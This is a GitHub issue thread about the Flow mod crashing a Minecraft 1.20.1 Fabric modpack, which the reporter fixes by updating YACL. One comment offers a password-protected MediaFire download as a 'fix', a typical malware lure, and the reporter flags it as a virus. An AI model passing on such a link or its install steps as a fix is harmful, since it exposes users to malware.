### ISSUE TITLE
Flow Mod breaking with modpack

### ISSUE THREAD

**Issue by Supernova-Codes** [IMB11/Flow#60]
### I am playing in 1.20.1 Fabric, which is supposed to be supported according to modrinth. it was working fine until about a week ago where the game crashed everytime I try to launch it with the flow mod. It works perfectly fine when I remove the flow mod. 

The logs can be found here: https://mclo.gs/ks2XH7J

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Supernova-Codes** [comment]
> to fix your trouble try download this fix, i see it in another issue, https://app.mediafire.com/3ag3jpquii3of password: changeme when you installing, you need to place a check in install to path and select "gcc."

apparently its a virus

**Comment by IMB11** [comment]
Please upload your logs to mclo.gs

**Comment by Supernova-Codes** [comment]
> Please upload your logs to mclo.gs

I modified the post to include the mclo.gs log

**Comment by Supernova-Codes** [comment]
This issue was fixed, I looked into it and I just needed to update YACL(Yet Another Config Lib)

**Comment by Supernova-Codes** [comment]
_
